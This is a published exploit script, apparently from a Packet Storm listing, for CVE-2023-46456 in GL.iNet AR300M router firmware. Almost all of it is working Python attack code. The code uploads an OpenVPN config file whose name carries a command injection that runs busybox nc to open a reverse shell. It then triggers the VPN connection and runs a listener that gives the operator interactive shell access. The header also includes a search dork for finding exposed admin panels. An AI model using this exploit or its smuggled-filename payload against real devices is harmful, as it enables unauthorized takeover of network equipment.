GL.iNet AR300M 3.216 Remote Code Execution

2024-03-0400:00:00
Michele Di Bonaventura
packetstormsecurity.com
gl.inet ar300m
remote code execution
openvpn client
python script
malicious config file
openvpn client id retrieval
vpn connection
reverse shell listener
7.4 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
39.2%
JSON
`#!/usr/bin/env python3  
  
# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client  
# Google Dork: intitle:"GL.iNet Admin Panel"  
# Date: XX/11/2023  
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura  
# Vendor Homepage: https://www.gli-net.com  
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar  
# Version: 3.216  
# Tested on: GL.iNet AR300M  
# CVE: CVE-2023-46456  
  
import socket  
import requests  
import readline  
from time import sleep  
from random import randint  
from sys import stdout, argv  
from threading import Thread  
  
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)  
  
def generate_random_string():  
return ''.join([chr(randint(97, 122)) for x in range(6)])  
  
def add_config_file(url, auth_token, payload):  
data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}  
try:  
r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)  
r.raise_for_status()  
except requests.exceptions.RequestException:  
print('[X] Error while adding configuration file')  
return False  
return True  
  
def verify_config_file(url, auth_token, payload):  
try:  
r = requests.get(url, headers={'Authorization':auth_token}, verify=False)  
r.raise_for_status()  
if not r.json()['passed'] and payload not in r.json()['passed']:  
return False  
except requests.exceptions.RequestException:  
print('[X] Error while verifying the upload of configuration file')  
return False  
return True  
  
def add_client(url, auth_token):  
postdata = {'description':'RCE_client_{}'.format(generate_random_string())}  
try:  
r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)  
r.raise_for_status()  
except requests.exceptions.RequestException:  
print('[X] Error while adding OpenVPN client')  
return False  
return True  
  
def get_client_id(url, auth_token, payload):  
try:  
r = requests.get(url, headers={'Authorization':auth_token}, verify=False)  
r.raise_for_status()  
for conn in r.json()['clients']:  
if conn['defaultserver'] == payload:  
return conn['id']  
print('[X] Error: could not find client ID')  
return False  
except requests.exceptions.RequestException:  
print('[X] Error while retrieving added OpenVPN client ID')  
return False  
  
def connect_vpn(url, auth_token, client_id):  
sleep(0.25)  
postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}  
r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)  
  
def cleanup(url, auth_token, client_id):  
try:  
r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)  
r.raise_for_status()  
except requests.exceptions.RequestException:  
print('[X] Error while cleaning up OpenVPN client')  
return False  
return True  
  
def get_command_response(s):  
res = ''  
while True:  
try:  
resp = s.recv(1).decode('utf-8')  
res += resp  
except UnicodeDecodeError:  
pass  
except socket.timeout:  
break  
return res  
  
def revshell_listen(revshell_ip, revshell_port):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.settimeout(5)  
  
try:  
s.bind((revshell_ip, int(revshell_port)))  
s.listen(1)  
except Exception as e:  
print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))  
exit(1)  
  
try:  
clsock, claddr = s.accept()  
clsock.settimeout(2)  
if clsock:  
print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))  
res = ''  
while True:  
command = input('$ ')  
clsock.sendall('{}\n'.format(command).encode('utf-8'))  
stdout.write(get_command_response(clsock))  
  
except socket.timeout:  
print('[-] No connection received in 5 seconds, probably server is not vulnerable...')  
s.close()  
  
except KeyboardInterrupt:  
print('\n[*] Closing connection')  
try:  
clsock.close()  
except socket.error:  
pass  
except NameError:  
pass  
s.close()  
  
def main(base_url, auth_token, revshell_ip, revshell_port):  
print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')  
  
payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)  
print('[+] Filename payload: "{}"'.format(payload))  
  
print('[*] Uploading crafted OpenVPN config file')  
if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):  
exit(1)  
  
if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):  
exit(1)  
print('[+] File uploaded successfully')  
  
print('[*] Adding OpenVPN client')  
if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):  
exit(1)  
  
client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)  
if not client_id:  
exit(1)  
print('[+] Client ID: ' + client_id)  
  
print('[*] Triggering connection to created OpenVPN client')  
Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()  
  
print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))  
revshell_listen(revshell_ip, revshell_port)  
  
print('[*] Clean-up by removing OpenVPN connection')  
if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):  
exit(1)  
  
print('[+] Done')  
  
if __name__ == '__main__':  
if len(argv) < 5:  
print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))  
exit(1)  
  
main(argv[1], argv[2], argv[3], argv[4])  
  
  
`